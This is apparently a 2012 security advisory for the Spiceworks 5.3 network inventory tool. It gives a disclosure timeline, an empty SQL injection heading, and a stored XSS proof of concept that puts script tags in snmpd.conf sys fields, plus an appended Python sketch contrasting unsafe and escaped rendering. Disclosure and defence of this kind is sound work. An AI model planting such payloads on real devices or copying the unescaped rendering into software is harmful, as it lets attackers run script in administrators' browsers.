Product: SpiceWorks
Version: 5.3.75941
Vendor Site:
Software Download Link:
Installer Filename: Spiceworks.exe  MD5: 023bd361c0f9402dc07adbc5a72fe31d


04 Jun 2012: Vulnerability reported to CERT
08 Jun 2012: Response received from CERT with disclosure date of 20 Jul 2012
23 Jul 2012: Update received from CERT: No response from vendor
23 Jul 2012: Public Disclosure

SQL Injection (Post-Authentication):


Stored XSS:

An attacker can configure their snmpd.conf file to contain malicious JavaScript as shown in the proof of concept below:

rocommunity public
com2sec local	localhost	public
view	systemview	included	.
view    systemview      included	.
view    systemview      included	.1 80
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName dook<script>alert('name')</script>
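
Added example (not part of the original advisory and not Spiceworks code): a Python sketch of how an inventory page could handle the three sys* values from the proof of concept above, with raw interpolation shown next to output encoding and an ingest-time check. The function names and the table markup are assumptions made for illustration.

```python
import html
import re

# The sys* directives from the proof of concept above (values copied from the page).
SNMPD_CONF = """\
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName dook<script>alert('name')</script>
"""

SYS_FIELDS = {"syslocation", "syscontact", "sysname"}
ANGLE = re.compile(r"[<>]")  # markup delimiters never needed in these fields


def parse_sys_fields(conf):
    """Return {directive: value} for the device-controlled sys* strings."""
    fields = {}
    for line in conf.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key in SYS_FIELDS:
            fields[key] = parts[1] if len(parts) > 1 else ""
    return fields


def render_unsafe(fields):
    # Vulnerable pattern: scanned strings are concatenated into HTML as-is,
    # so a <script> element stored by the device runs in the viewer's browser.
    return "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in fields.items())


def render_safe(fields):
    # Hardened pattern: HTML-encode every device-supplied value at output time.
    return "".join(
        f"<tr><td>{html.escape(k)}</td><td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in fields.items()
    )


def fields_with_markup(fields):
    """Names of fields containing < or >, for logging or alerting at ingest."""
    return sorted(k for k, v in fields.items() if ANGLE.search(v))


if __name__ == "__main__":
    scanned = parse_sys_fields(SNMPD_CONF)
    print(render_safe(scanned))
    print("flagged:", fields_with_markup(scanned))
```

Encoding at output is the fix; the ingest check only gives visibility into devices that report markup in these fields.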
